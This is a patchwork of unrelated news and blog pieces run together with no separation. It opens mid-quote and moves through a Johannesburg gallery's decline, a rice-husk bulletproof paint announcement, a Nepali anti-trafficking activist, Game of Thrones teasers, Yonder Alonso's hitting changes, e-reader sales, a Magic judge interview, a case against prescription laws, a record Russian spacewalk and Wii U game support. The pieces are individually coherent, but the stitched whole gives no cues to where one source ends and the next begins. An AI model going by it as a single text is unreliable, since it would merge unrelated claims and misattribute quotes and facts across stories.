"But I have found that in the simple act of living with hope, and in the daily effort to have a positive impact in the world, the days I do have are made all the more meaningful and precious. And for that I am grateful. It isn't possible to put into words the love and gratitude I feel to everyone who has and continues to support and inspire me every day. To you I simply say: you know."
CNN's John King contributed to this report.
JOHANNESBURG: At one of Africa's premier art galleries, thieves have stolen roof copper to sell for scrap, the telephones and security cameras don't work and half the exhibition space is closed and awaiting repairs. Yet for 21-year-old photographer Tshepiso Mazibuko, the chance to exhibit at the Johannesburg Art Gallery was a highlight of her young career.
“It was like a moment of triumph,” said Mazibuko, who described herself as humbled to be following the path of prominent artists whose work has been displayed at the century-old gallery. Titled ‘Free From My Happiness', the 2016 exhibition by Mazibuko and two other photographers born after the 1994 end of white minority rule featured images of Thokoza, a hardscrabble area near Johannesburg whose name means “happiness” in Zulu.
Currently the gallery is loaning work by Claude Monet, Pablo Picasso, Francis Bacon and other luminaries to an exhibition in Monza, Italy, reflecting the depth of a collection that also includes contemporary South African art and traditional artefacts from southern Africa. For many years, however, the gallery has been in a dire state, struggling with water damage, botched renovations, low morale, thin staffing and a lack of municipal funding.
In the latest chapter of its troubled history, the gallery reopened on May 7 after a three-month closure that allowed workers to shift art from an area vulnerable to rain leaks because of the theft of roof material into safer storage spaces. No artwork was damaged by water seeping into the downtown gallery, whose original structure was designed by British architect Edwin Lutyens in the early 20th century.
The gallery's deeper challenges include identifying audiences in a country with pressing social problems and a history of racial conflict and reconciliation. It used to attract affluent, and overwhelmingly white, patrons until the last years of apartheid, but many South African urban areas changed as blacks, whose movements were previously restricted, migrated to the cities.
Now the stately, colonial-era gallery at Joubert Park seems out of sync in its gritty, low-income neighbourhood. Many people in the area are immigrants from other African countries, making it hard for the gallery, where admission is free, to establish ties with the transient population.
“There's a section of people who are nervous about coming here because they're scared about the area” and then there are “people in the area who are scared to come to the gallery because it's an intimidating, imposing space,” said registrar Tara Weber.
The gallery wants to focus more on hosting artists from around Africa even as it highlights art that may be associated with an earlier era of white domination, she said.
“I don't think it's something that can be ignored, but I also think that it's possible for us to have these things in our collection and appreciate them for what they are without kind of denying the problems of their history, and also of the building as well,” Weber said.
After delays caused by municipal bureaucracy, the gallery lent French print masterpieces for a seven-month exhibition that ends June 4 at the Leon Dierx museum on Reunion, a French island in the Indian Ocean. In an email, museum director Bernard Leveneur said more than 19,000 people had visited the show.
The Johannesburg Art Gallery reopened with “South Facing”, an exhibition of sculptures by Mozambique-born Angela Ferreira. While turnout was big for the launch, only a few people walked the halls on a recent weekday morning, though school groups visit regularly.
In local elections last year, the political opposition dislodged the ruling African National Congress party from power in Johannesburg” the new mayor, Herman Mashaba, vowed to clean up corruption and expressed support for the gallery. Meanwhile, funds have been earmarked to stop the leaking, fix broken elevators and install security features including outdoor floodlights, while a plan to digitise the entire collection is in the works.
“We still have the same struggles, the same battles, that we've been going through for years now,” said Musha Neluheni, the acting chief curator. But she added: “We don't want to move. We like our building.”
Nguyen Thi Hoe (L) introduces her bulletproof paint at a conference on May 16
A senior Vietnamese chemist announced Thursday she had successfully made a new bulletproof paint with rice husk that allows for much thinner and lighter vests than the current ones.
Nguyen Thi Hoe, chairman of Kova Paint Corporation, also introduced three more paints made with rice husk that are flame resistant, bacteria resistant and rustproof.
More than 250 scientists and business representatives from different countries, including the US, Germany, Switzerland, Singapore and Malaysia attended the event at Ho Chi Minh City's New World Hotel where Hoe announced her findings.
She said the major material used to make the four paints is nano silica taken from rice husk.
The bulletproof paint improves the proofing property of the vest that is lighter thanks to fewer fabric layers.
Hoe said she had tested the bulletproof vest made with her new paint in Cambodia.
A bullet shot from a 2-meter distance was obstructed by a vest with 6 fabric layers covered with the new paint, while common bulletproof vests have to have between 20-40 layers to be able to stop that bullet, she said.
The flame resistant paint can protect wood, steel and concrete surfaces for 2-6 hours under fire of up to 1,000 degrees Celsius, while the anti-bacteria paint can destroy up to 99 percent of bacteria on the painted surface, she said.
Objects painted with her rustproof paint can stay intact under the sea for up to 10 years, Hoe told visitors.
She said she is seeking to register her inventions in the US and transferring the technology to bulletproof vest makers around the world.
Anuradha Koirala is a social activist from Nepal. She has helped rescue and rehabilitate more than 12,000 victims of sex trafficking. She has also prevented over 45,000 children and women from being trafficked. A former English teacher, Anuradha started Maiti Nepal in a small house in Kathmandu with her own savings when she was deeply distressed by the condition of girls and women who were sold to brothels in India.
Today her organization, Maiti Nepal, patrols the Indo-Nepal border with the help from local police, rescues trafficked women from brothels in India with the help of Indian authorities and helps rescued women reunite with their families.
The US State Department reports that each year more than 10,000 women and girls are trafficked from Nepal to India and then sexually exploited. According to CNN, one such girl Anuradha has helped rehabilitate is Geeta. Geeta was nine when she began wearing makeup, staying up all night, and having sex with as many as 60 men a day. She was rescued at the age of 14 and has since been staying in a safe house compound run by Maiti Nepal trying to find meaning in her life. Anuradha has nothing but open arms to offer. For her courage and exemplary work, she won the CNN Hero of the Year award in 2010.
Anuradha's work is difficult and challenging. She gets death threats daily, but she doesn't care. Even in her late 60s, she continues to fight the social evil with the same ferociousness she once did. In an interview with Equality Now, she said, “Survivors' needs are complex and multiple. Many survivors come back home in a traumatized state, the prevalence of STDs and HIV among them is also quite high. Some survivors are infected by Multiple Drug Resistance Tuberculosis and due to this rehabilitation is difficult and complicated. Despite being globally recognized, getting funds for anti-trafficking projects continues to be extremely difficult.”
To stay updated with more positive news, please connect with us on Facebook.
It's hard to believe we're almost at the Game of Thrones season finale already, but then time flies when you love a show with only ten episodes per year. We have a couple new interviews today that look forward at the finale with hints of things to come.
After “The Dance of Dragons,” it wasn't clear if we'd see Dorne again. With Doran's negotiations in place, no one knew quite what to expect. Well now a new interview with Jessica Henwick hints that things in Dorne will once again heat up in the finale.
Henwick spoke with Yahoo News Singapore when she was in town there recently and confirmed the Sand Snakes will be part of something “extreme” this coming Sunday.
“What happens with the Sand Snakes is…extreme. Very extreme. So I'm really curious to see how people take it. I don't know what else I can say!” the actress tells Yahoo Singapore. “Episode 10 sets the rest of the show on a very certain path. It's a big move in Game of Thrones, and the Sand Snakes are a part of it.”
Yahoo tries to get some info on her alleged role in Star Wars: The Force Awakens but Henwick remains cagey, saying, “If I had a Singaporean dollar for every time I got asked that question, I would not be rich, but if I had a pound, I'd be pretty damn rich.”
She is also unable to confirm whether or not she'll be able in season 6. She says, “I don't know, to be honest.”
Check out the rest of the interview for more on pulling off her own whip stunts this year.
The director of last week and this Sunday's episodes, David Nutter, talks to Vulture about his work on the series. The interview is mainly focused on the handling of the difficult Shireen and Daznak's Pit scenes, as Nutter is smartly tight-lipped on the future.
Of “Mother's Mercy,” Nutter is quoted as saying, “All I can tell you is that it's like no season finale they've had before.”
The director offers a lot of insight into “The Dance of Dragons,” explaining how much CGI went into creating the gladiator ring and thousands of extras needed for the final sequence. He agrees it was tougher to film than the Red Wedding massacre, which he also directed.
“Oh yes, much more involved because of the scope of it, and 1,000 extras every day. It took 12 days to shoot the entire sequence.”
For all the directorial details of “The Dance of Dragons,” head over to Vulture.
Just a reminder- the Game of Thrones Season 5 Soundtrack is now available for purchase digitally!
I told Yonder Alonso that I had only one problem with writing a story about him — that whatever I put together would not be nearly as good as his “Letter to My Younger Self” that he penned for “The Players' Tribune” on April 24.
In that article, the Oakland A's first baseman detailed his family's escape from Cuba to Miami when he was 10 and all of the financial hardships that followed. Many of the details were quite moving, and one in particular stood out:
Alonso, while on a baseball scholarship at the University of Miami, sometimes would find his father waiting at the team plane, late at night at the end of a road trip. His father, Luis, would need his assistance cleaning a warehouse — emptying trash, scrubbing toilets, you name it — in the family's endless quest to make ends meet. The jobs sometimes took all night.
Article continues below ...
Yet, as compelling as Alonso's first-person account was, his story is still unfolding. In fact, there is a chapter in development that would be the topper to the entire tale, a chapter that Alonso says would be “like something out of a fantasy movie.”
The All-Star Game is in his hometown of Miami on July 11. And in the latest round of fan balloting, Alonso was the leader among American League first baseman, slightly ahead of the Tigers' Miguel Cabrera.
MORE: Yonder Alonso hopes to stay with the A's for the long term
The election of an Oakland Athletics player alone would be major news — before Josh Donaldson in 2014, the A's last elected starter was Jason Giambi in 2000. But the election of Alonso, who was not even certain to be offered a contract by the team last off-season, would be . . . well, let him tell it.
“I'd probably be crying the whole time I'm there,” Alonso says. “There would be a lot of tears.
“You're talking to a guy who used to sneak his way into the Orange Bowl with his friends for the Miami Hurricane games. And now that's (the site) for the stadium for the Marlins.
“You're talking to a guy who lived half a mile away from there. All his friends are literally half a block from there. I used to clean offices three miles from there. I went to school a couple of blocks away. It would be full circle, completely – and I mean full circle.
“I know I would be representing my team and obviously I'd be representing my last name. But I can tell you this, man. The people who watch baseball in Miami that are Cuban . . . those people are making the All-Star Game with me, if I am to make the All-Star Game. That, for me, is even more important than myself making the All-Star Game. If I can have a little bit of happiness for those people, that's really all that matters.”
Alonso, batting .306 with 17 homers and 1.043 OPS, will be the logical choice to represent the Athletics even if he does not win the fan balloting. Amazing, considering that his previous career-high for homers was nine, and that his .721 OPS entering the season was well below-average for a first baseman.
But again, it's best to allow Alonso to explain.
Changes had to be made
“It's pretty simple,” Alonso says. “I was heading in a direction where I saw my career on the downfall. I think in August and September of last year I realized that if I don't make some adjustments, I will be heading into a backup role, not get the at-bats that I want.
“I'm 30 years old. I'm in my prime. I pretty much was very truthful honest with myself. I realized that if you're going to play first base, you've got to make sure you're doing everything to make yourself valuable.
“I needed to work on my hitting.”
He took a week off after the season ended, then got busy with tee work. He watched video of himself, determining his flaws, how pitchers attacked him. And he watched video of hitters he wanted to emulate, hitters who had the kind of leg kick that he planned to incorporate into his swing.
But Alonso didn't stop there.
AP/Copyright The Associated Press. All rights reserved.
He spoke with Danny Valencia, his former teammate with the A's and at Miami. He spoke with his brother-in-law Manny Machado. He spoke with Joey Votto, Eric Hosmer, Carlos Beltran, Rougned Odor . . .
Rougned Odor?
About the only thing the 6-foot-1, 220-pound Alonso has in common with the 5-11, 195-pound Odor is that they bat left-handed.
“I know him from playing against Texas last year,” Alonso says. “I really enjoyed the little fight he had in him. He swings the bat like a big boy. I was like, ‘How can you generate so much power in that little body?'”
“The first thing he said to me was, ‘Use a leg kick and a heavy bat.' Then after that we started getting very deep into things. And the next thing you know I was like, ‘This guy knows what's up.' He's a young guy, but he's fully detailed on what's happening at the plate.”
Alonso says that Valencia actually was the first to tell him that he needed to make changes. The two, who have known each other since high school, were reunited with the A's in Dec. 2015 when Alonso arrived from the Padres in a deal for left-hander Drew Pomeranz.
AP/Copyright The Associated Press. All rights reserved.
Valencia was adamant — and painfully honest — with his old friend.
He explained to Alonso the importance of a hitter unleashing his “A” swing until there were two strikes. And he stressed to Alonso the importance of generating power from his lower half.
“He relied on his hands too much,” says Valencia, who is now with the Mariners. “I said he barrels the ball up better than most everyone I had played with, but it was all hands. He only had pull power, and he's way too strong to not be able to hit the ball out all over the park.”
Votto, whose presence led to the Reds' trade of Alonso to the Padres in Dec. 2011, also was a major influence. Alonso says he reached out to Votto about four times during the off-season. Each time, Votto responded with a long text.
“He's Albert Einstein when it comes to hitting. He says things sometimes that I don't even understand,” Alonso says. “But once you really think about them, you realize what he's talking about.
“I actually asked him about the leg kick. I asked, ‘Do you think I could do something like that?' And he said, ‘Absolutely, I think you can. You do have good hand-eye coordination. You do have a great approach. You do hit lefties well. You hit the ball the other way. I don't think there is a reason you can't do those things.”
Says Votto, “With almost every hitter that I chat with, we usually discuss comfort. I ask, ‘Does it feel comfortable?' Or, ‘How do you feel about it?' If I get a positive reply, then clearly they are on to something they like and I wouldn't want to get in the way of that.
“Yonder was the same way. He sent me some video in the off-season. It was a side view of him hitting. He seemed to have added more rhythm and a high leg kick to his swing. I asked him how it felt and he said, ‘Fantastic!' It's funny how much feeling good about something and believing in it can be something that can create change.”
Votto concludes with a typical Votto thought:
“Yonder is reaching his potential now. I'm not sure what kind of ceiling he has, but I'm happy for him and I wish him nothing but long, deep fly balls and a plague to the shift.”
Humbled by fans' All-Star vote
Alonso, in the second update of the AL All-Star balloting, trailed Cabrera by about 40,000 votes.
That alone shocked him.
“I was in awe. It was so humbling,” Alonso says. “I could not believe I was behind a Triple Crown winner, let alone one of the best hitters in our era, in our generation, in all baseball.”
In the third update, the one announced this week, Alonso pulled ahead of Cabrera by 4,457 votes.
“I'm still humbled by the situation,” Alonso says. “Sure, there is a lot of time left until the All-Star Game. But it's one of those things where you say, ‘My hard work has finally paid off. I'm in the middle of this thing.' ”
At least so far, fans are not simply voting for big names from the past. Yankees rookie Aaron Judge leads all vote-getters. The Reds' Zack Cozart is ahead of the Dodgers' Corey Seager among NL shortstops. The Twins' Miguel Sano and Indians' Jose Ramirez lead Machado among AL third basemen.
Alonso believes that he is drawing support throughout the Bay Area, from Giants fans as well as A's fans. And he believes social media is making fans more aware of which players are producing All-Star seasons, even if they are in smaller markets.
He doesn't want to get ahead of himself.
But yes, he is allowing himself to dream.
“My dad and I, we used to watch baseball all the time,” he says. “And when the All-Star Game came, it was like a holiday. He was a happy guy waking up that morning – the All-Star Game was that night. I remember that's how my dad was. I assume everybody is like that, especially in Miami, especially in the Cuban community, the Latin community.”
I ask Alonso what the moment would mean to his father, Luis, who had played professionally in Cuba, and his mother, Damaris. He replies, “I don't even know,” then starts talking about what it would be like to share the All-Star experience with his father and 18-month-old son, Troy.
“I'm going to do the whole stuff I used to watch when I was a kid – the player with his son, the player with his dad,” Alonso says. “I'm going to make sure my dad is a big leaguer and an All-Star, in the locker room and everything.”
And his son? He would be part of it, too, even at 18 months old?
“He can swing it, though,” Alonso says, chuckling. “He's got a little leg kick.”
I don't think Steve Jobs would get it wrong. He released the iPad knowing there was a high demand for digital reading devices. And he knows that demand will continue to grow. But what baffles me is in this article below, it cites a recent Harris Poll as saying 80% of adults polled weren't likely to get an e-reader. What?
Take a look:
Survey: Children like e-books, parents not so much - Yahoo! Finance.
Ok. Maybe living in Silicon Valley we may be in our own little high-tech bubble. But 80% of adults seems like an awfully high number of low-tech folks, especially as the U.S. population of 300 million continues to progress towards an all-digital world.
Just look at the latest statistics from the American Association of Publishers: U.S. publishers reported $23.9 billion in book sales in 2009, a 1.8% decrease from 2008. As for e-Books? Sales are growing. Data shows $313 million in sales in 2009, up nearly 177% from 2008. So, the popularity of digital reading continues to rise.
Plus, newspapers and magazines are struggling to retain readership. Fewer people are getting their real-time news from television and radio. That 80% of adults IS going to get tired of sitting at a desk reading news. I may be stepping out on a limb here, but I do think that at least 60% of adults will have some form of e-reader in the next five years.
Think about it this way. Kids today will be adults tomorrow (that took some real thought), and they're going to help drive those stats higher, quickly. Especially since colleges are even giving iPads away to their students, such as Stanford, Duke, Illinois Institute of Technology, and University of Maryland.
The success of Apple's iPad and Amazon's Kindle is proof digital reading devices are in high-demand, and that demand is growing exponentially.
More than one million iPads sold in the first month on the market, and Forbes Velocity Blog quotes UBS analyst Maynard Um as projecting Apple to sell 28 million iPads in 2011.
And Amazon's Kindle, which was originally introduced in 2007, has sold millions. Although Amazon doesn't release the exact number of units sold, The Benchmark Company's stock analyst Frederick Moran has been quoted as saying that Kindle sales are about three to five percent of the retailer's total sales -- so nearly $2 billion in Kindle sales projected for this year. As for e-book sales, Amazon did say earlier this summer that it sells 143 e-books for every 100 hardcover books (Of course, e-books are much cheaper than hardcover).
I know it's just a Harris Poll, just one poll, but I still have a hard time believing that 80% is a really high number of adults that are unlikely to buy an e-reader. What do you think about e-reader market? What's your read of adoption today and projected growth? Share your stats and thoughts in the comment section below and I will incorporate your thoughts in a future blog post.
A couple of comment so far:
nerfer
Hello Judges and welcome back to Judge of the Week! This week's judge is Regional Coordinator Guillaume Beuzelin of France. Read all about him…
Name: Guillaume Beuzelin
Level: 3
Location: France, very close to Geneva (Switzerland)
Judge start date: I started to judge in 2006, passed L2 in 2008 and made L3 in 2011.
Occupation: L3, RC of France, Member of the Bazaar of Moxen TO team.
Favorite card: Topsy Turvy, I really enjoy when the rules of a game change during the game.
Least favorite card: Kangee, Aerie Keeper (to check if Alexis Rassel is reading this post).
Favorite format: As Soon! The general rules are you have infinite life, infinite mana and as soon as you can do an action during a game you have to – if you miss it, you lose. If you want further details you can ask: Emilien Wild , Elliot Raff , Chris Lansdell or myself. We all are big fans of this game!
Favorite non-Magic Game: Dominion, Race for the Galaxy
Best tournament result: Qualification to the French Nationals
Random fact about yourself: My girlfriend was able to reply to a rules question having never played Magic or read the rules… She was my proofreader when I was translating Cranial Insertion.
Why did you become a judge?
Interesting question… Two judges from my area were disqualified and suspended. The last active judge in the area was one of my friends and he encouraged me to test to be able to have enough staff for the Pre-Releases.
What are you currently working on within the judge program?
I'm currently writing an article or more (probably a series of articles) about the tournament procedures: VIP, Sleep-in Special and Public Events in general.
As RC, I also have several projects in my region, certification being the biggest one.
What do you do on a day-to-day basis for the Judge program, outside of events?
As RC I have daily tasks to do, related to the role: helping TOs staff their events, commenting on GP applications for the French judges, being sure that the information is correctly relayed to my community and all other tasks linked to the RC role.
Tell us your favorite judge story.
At the last official French Nationals some stones started to fall from the roof. Below was a Legacy tournament, so the first reflex for some of the players was to protect their cards. We explained to them that their life was probably more important and we promised to refund all the players who didn't want to continue to play. I grabbed as many judges as possible to move tables and chairs and we asked the remaining players to follow us to another safe area of the room. We then re-paired the round with the remaining players.
How has being a judge influenced your non-Magic life?
I have developed good logistics and organizational skills which can be useful outside of a tournament; for example, my cousin asked me to help with the organization of her wedding and one of my teachers asked me to organize a conference because he knew what I was doing as a judge. Even if my English is far from perfect, Magic has had a very positive influence on my English skills.
Magic also has a strong impact on my social life: every two or three weeks I meet the same group of friends no matter where I am in France/Europe/the world, and after a few years some have become good and reliable friends.
What motivates you to do what you do within the community?
I like to help people, but I need to see the impact of my decisions on those people. At my scale, the cause/consequence is pretty easy to identify so I'm able to get the feedback I need about my actions and continue to help people.
What is the best part about the Judge Program in your opinion?
Personally, I really like the fact that I'm able to develop skills in the judge program which would be useful for a future job. For example, I had the opportunity to manage a team of 40 people. It's very formative and I'm pretty sure I will be able to use this experience during a job interview. Being able to write constructive reviews is also a complex exercise that can have some positive impact on the other areas of your life.
What in your opinion is the greatest challenge for the judge program at this time to overcome?
I'm very glad to see that we reached 5000+ judges but that also means we will have to spend more and more time to keep united. Every judge has their personal goals and we have to make sure that it will be possible for everybody to reach their goal and be a good judge at the same time. Each judge at each level has the responsibility to make sure that their fellow judges feel integrated.
What is your favorite non-judging moment that happened with other judges?
I wrote this paragraph several times with a different moment each time and the conclusion is: I really enjoy when we sit at a bar, a restaurant or at home simply talking for hours and sharing a meal. The best ever was probably after Bazaar of Moxen this year when we had this very nice table speaking Frenglish, talking and laughing until 2 or 3 AM.
Another very good moment was the second day of the French conference when we played paintball on a large field. All 20 judges were mixed with 15 firemen to create teams to have a big big fight! By the way, I have been impressed by the importance of the team working in such games, maybe should we train our team leaders on a paintball field 😛
If you could chat with one person, real or fictional, dead or alive, who would it be and why?
Mark Rosewater. I really like the game design and Mark has very interesting points of view on this topic. If you have never read one of his articles or listened to one of his podcasts you should probably go to http://magic.wizards.com/en/articles/archive/116841.
By listening to and reading Mark Rosewater I understand more things about Magic than playing it for over 10 years.
What character in Magic (real or fictional) represents you the best, and why?
Mercurial Chemister: half-logical, half-reckless 🙂 As you can guess I'm a big fan of the Izzet guild.
Who are/were your role models in the Judge Program? What are/were their certain qualities that drew you to them?
Antoine Bouaziz , for his outstanding understanding of the human nature.
Jason Lemahieu for his incredible communication with players.
Kevin Desprez for his very interesting points of view on the IPG and the way he rationalized many processes in tournaments.
Kim Warren for sharing her general positive mood and being always positive.
What do you feel needs to be improved in the Judge program?
Communication. I've been here for a while and I regularly discover a new project, a new website… The Wiki clearly helps to centralize everything but it's not perfect yet. There are also many cross conversations between forums and lists but on the other hand sometimes the information doesn't circulate enough.
The communication inside the Judge program can be improved, be it's already improving and I'm pretty sure that it will get better and better.
What has been your best experience in the Judge Program?
Working towards L3. It has been the most difficult exam I passed (I decided to not show for my financial analyst exam at my business school). I was able to pass it because a few people invested a lot of time to help me: Alexis Rassel, Pierre Laquerre , Daniel Kitachewsky and Carlos Ho . Without their help I would probably not have tried to test. Being able to grow because people decided to help you is really a strong positive experience.
What advice would you give to a Judge growing up through the program?
Do it step by step. There is no need to rush. Being a rising star who will burn quickly and turn into a dead star a few months/years after is not very healthy for you and for the program. Everybody evolves at their own rhythm.
What is your favorite “after event” story?
When a judge locked out 6 others judges at midnight because he forgot the key inside of the apartment.
Tell us a story of a challenge or problem at an event, and what did you and your teams do to overcome it?
Flashback when we were still running sealed events with a starter pack + boosters. In the morning we discover that the attendance was way larger than expected, so we didn't have enough starters for everybody, but we had some extra boosters. As all the players have to receive the same product for a sealed tournament and a starter was not equal to 3 boosters (because there was an extra uncommon and because you could not open 2 copies of the same card) we had to open plenty of boosters to generate normal starters.
After that, due to the huge attendance some players played outside in a tent… in December… during a snowy day… this was an interesting experience. Obviously we tried to put as many players as possible inside, but afterwards there was nothing more we could do except communicate with players and be sure that the judge outside did not forget his coat 🙂
If you were a creature what would be your creature type?
Easy question – Shapeshifter! I like to play with the fact that only by changing my clothes people will clearly change their social interactions with me.
What country/continent is your favorite for GPs/PTs, and why?
Hum, let's say North America. When I judge in US or Canada I really enjoy the interactions with the players. I think they understand that we are in tournaments to help them to spend a good time. Each time I go to North America I'm surprised how often players thank you for your ruling, even if it's against them.
What do you do to make GPs/PTs special?
I try to have a special goal for each of these tournaments. I don't really care to have one more special event on my list, my goal is to learn or teach something at each event. When I have the feeling that the previous tournament was a bit boring I try to figure out ‘what could I have done better, which goal could I have reached'?
What's the coolest event you have ever been to, and why was it so amazing?
PT Nagoya 2011. My first time in Japan and I passed my L3. One of the reasons would have been enough to rate this event as amazing but the two combined make it just perfect.
What's the farthest you have ever traveled for a Magic event?
I had the chance to travel 2 times to Japan.
What hobbies do you have outside of Magic?
I really enjoy doing stuff related to boardgames: play, explain and design (so far I'm not very good with the last).
I like to travel, I like to bike. I really enjoy mixing the two concepts.
I really enjoy sharing good meals and good times with my friends.
How do you not lose your mind?
I keep it in a safe and I avoid using it too much.
Two Truths and A Lie
Two of the following answers are true, figure out which!
I'm a big fan of Aqua.
My favorite place is Český Krumlov.
I speak fluent German.
The answer to the last Two Truths and a Lie...
Chris is actually a big Soccer/football fan, and watches a lot of games with his daughter!
Thanks for the interview, Guillaume! Join us again next week, when we get to meet another RC, so stay tuned!
What does thorough-going libertarian medicine look like? Writing in the Journal of Medical Ethics, Jessica Flanigan, of the University of Richmond, Virginia, opens a window on the future. She says that it would abolish prescription drug laws because they “violate patients' rights to self-medication”. “Patients have rights to self-medication for the same reasons they have rights to refuse medical treatment according to the doctrine of informed consent (DIC),” she argues.
Medical practice without prescriptions may sound troubling. But Flanigan points out that while all developed countries have a prescription drug system, many do not enforce it strictly, like Chile, Colombia, Ecuador, Mexico, Peru, Venezuela, Greece, Egypt, Hong Kong, Philippines, and Thailand. A 1987 study seemed to show that poisoning mortality did not increase in these countries. On the contrary, their mortality rates were significantly lower. “On-balance prohibitive pharmaceutical policies make patients medically worse off,” she says.
How would this regime work? Patients would be able to purchase drugs without a script. However, to ensure that patients truly give their informed consent, they would be required to discuss the potential risks and benefits with a pharmacist or a doctor.
What about dangerous drugs? Flanigan responds that patients are able to give informed consent to dangerous medical treatment, why not to dangerous pharmaceuticals? What about the danger of addiction and abuse? She admits that this is a danger, but she compares the situation with illegal drugs. If we have not been able to eliminate heroin and cocaine by declaring a war on drugs, a ban on using medicinal drugs without a prescription will not work either.
The prescription drug system is paternalistic, Flanigan concludes. “Patients ought to be regarded as the ultimate authority when it comes to decisions about their own bodies. But patients' authority doesn't stop at their ability to refuse treatment. In order to truly respect patients' rights, states must also abolish prescription drug requirements and recognise rights to self-medication.”
Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings.
Aug. 17, 2013, 3:56 PM GMT By Tariq Malik
Two cosmonauts set a new record for the longest Russian spacewalk on Friday, spending more than seven hours working outside the International Space Station to prepare it for the addition of a new Russian-built orbital lab.
Veteran cosmonaut Fyodor Yurchikhin and flight engineer Alexander Misurkin spent a total of seven hours and 29 minutes — a new Russian record — on a spacewalk to install power and data cables for a new Russian laboratory module expected to launch to the space station in upcoming months. NASA cameras beamed images of the record-setting spacewalk to Earth during the orbital excursion.
NASA spokesman Rob Navias said the cosmonauts broke a Russian spacewalking record that had stood for 23 years. Before Friday, the longest spacewalk by two Russian cosmonauts was seven hours and 16 minutes. It occurred on July, 17 1990 and was performed by cosmonauts Anatoly Solovyev and Alekandr Balandin to repair thermal protection gear on Russia's Mir Space Station. [Most Extreme Human Spaceflight Records of All Time]
"Today, that mark eclipsed by Yurchikhin and Misurkin," Navias said.
Friday's spacewalk was originally supposed to last 6.5 hours, but Russian flight controllers opted to extend it to allow time to retract a hand-operated extendable crane, called Strela, back into place. The cosmonauts initially planned to leave the crane extended for another spacewalk set for Aug. 22.
Yurchikhin and Misurkin spent most of their time Friday installing two long power cables and a data cable on an Earth-facing Pirs docking compartment, which faces the Earth and will ultimately be replaced with the new, and larger, Nauka Multipurpose Laboratory. Nauka means "Science" in Russian.
The cable installation was hard on the cosmonauts' hands, since they had to tackle the stiff cables with bulky spacesuit-clad gloves.
"Alright guys, take a break … relax your hands," Russian Mission Control radioed the pair.
But the work appeared to go smoothly, with Yurchikhin and Misurkin also installing a materials science experiment on the station's exterior and a guideline that can be used by future spacewalkers. At one point, one of the cosmonauts was heard humming to himself as they wrapped up their work.
Friday's spacewalk was the fourth of five spacewalks planned for the Expedition 36 crew on the International Space Station, and the first of two spacewalks scheduled in August. Yurchikhin and Misurkin will venture outside the station on Aug. 22 to install equipment for new science experiments.
A cosmonaut rides on the Strela boom during a spacewalk outside the International Space Station on Aug. 16, 2013. NASA TV
The Russian spacewalk was the first excursion by space station crewmembers since NASA aborted a spacewalk in U.S.-built spacesuits on July 16. That spacewalk, which included Expedition 36 crewmembers Chris Cassidy of NASA and Italian astronaut Luca Parmitano, was cut short when Parmitano reported a water leak inside his spacesuit that flooded his helmet with a substantial amount of water. An investigation into the cause of the leak is underway.
The space station's Expedition 36 crew consists of Yurchikhin, Misurkin, Cassidy, Parmitano, NASA astronaut Karen Nyberg and Russian cosmonaut Pavel Vinogradov.
Yurchikhin and Misurkin wore Russian-built Orlan spacesuits during their Friday spacewalk and experienced no setbacks with the gear. It was the seventh career spacewalk for Yurchikhin, who ended the day with a total of 45 hours and 55 minutes of spacewalking time. It was the second spacewalk for Misurkin, who now has 14 hours and three minutes of spacewalking time under his belt.
While the seven-hour, 29-minute spacewalk was the longest Russian spacewalk, it is not the longest spacewalk Yurchikhin has ever performed. In 2007, the cosmonaut spent seven hours and 41 minutes working outside the space station while wearing a U.S. spacesuit during a 2007 spacewalk with NASA astronaut Clayton Anderson to toss a huge, empty ammonia tank into space.
The longest spacewalk in history lasted eight hours and 56 minutes and was performed by NASA astronauts Jim Voss and Susan Helms on March 11, 2001 as they worked on the space station.
Russian cosmonaut Alexei Leonov performed the first spacewalk in history on March 18, 1965. That spacewalk for the former Soviet Union lasted just 12 minutes.
Email Tariq Malik at tmalik@space.com or follow him @tariqjmalikand Google+.Follow us @Spacedotcom, Facebookand Google+. Original article on SPACE.com.
Before the Wii U was launched Nintendo made the right noises about third-party support — here was a powerful system with backing from major players like EA, Activision and Ubisoft, we were told, and the innovative new controller would encourage unique, multi-screen experiences. Of course, everything is always amazing when pitched at E3, though the realities of the situation quickly dawned on us all and, actually, the perfect storm of Nintendo-exclusive content aligned with a packed third-party catalogue turned into a different kind of storm — of the public relations variety. The Wii U, throughout 2013, was caught in a maelstrom of negativity, some of it fair and based on fact but plenty that was undeserved.
The current malaise of major third-party developers is impossible to deny, as the line-up of multi-platform games actually coming to the Wii U is painfully thin, and those that are coming to the system are prominently supported by or published by Nintendo. Bayonetta 2 is a classic example — and may still tempt a modest number of gamers to put down the cash for the increasingly affordable system — while others such as Sonic Boom are part of deals Nintendo has struck, in that case the final part of a Sega agreement. When incentive and money isn't on the table directly from Nintendo support is minimal, with the likely exception of traditionally solid family-based genres that often perform for Nintendo, with the likes of Skylanders, the emerging power-house of Disney Infinity and Just Dance.
That last example is an interesting one as it brings Ubisoft into the frame, and even more so as it was the Wii — not Wii U version — of Just Dance 2014 that performed over the Holiday season. Therein lies part of the problem, of course, that thousands of gamers are still buying a Wii version of a game available on the newer system, exposing the challenge that Nintendo faces in converting that enormous last-gen audience — or some of it — to the new system.
Of course, Ubisoft is currently on the minds of Nintendo fans following its decision to delay the Wii U version of Watch_Dogs until after its release on other platforms, placing Nintendo's system at the bottom of that particular pile. Ubisoft's thinking is clearly driven by the best prospects for profit, and the minor contribution of Wii U sales of its games sales over recent months provide ample evidence of why the Wii U is last pick — it's making the company the least money.
While business logic has arguably been applied, plain-old common-sense suggests that Ubisoft has given Watch_Dogs on Wii U an unavoidable likelihood of failure. Yes, there are gamers that will only own a Wii U, yet with all of the other platforms — especially with PS3 and Xbox 360 bundles now available at budget prices — doing the rounds, it's likely that the majority with an interest in the game will already own it by the time it eventually hits Wii U. Delayed ports can play a role for the Wii U, but are highly unlikely to contribute much to hardware sales or to make the system a must-have.
As has been the case with other publishers, Ubisoft partly has itself to blame for Wii U software struggles, albeit while facing the challenges inherent in Nintendo's continued drive for unique control interfaces and infrastructure. Bringing games to Wii U may be awkward for development teams better accustomed to Sony and Microsoft's most recent generations of hardware, but Nintendo system iterations don't always have much of a chance — Rayman Legends missed a quiet earlier release window to grab game-starved Wii U owners, Splinter Cell Blacklist didn't include the popular local co-op, and Assassin's Creed IV Black Flag skipped DLC. Examples abound elsewhere, too, especially with EA's early and only contributions to the Wii U library. Business rationale contributed to a self-fulfilling prophecy — the Wii U versions of various games don't deliver sizeable numbers so publishers invest less, and the resulting pared-back games are even less appealing than before.
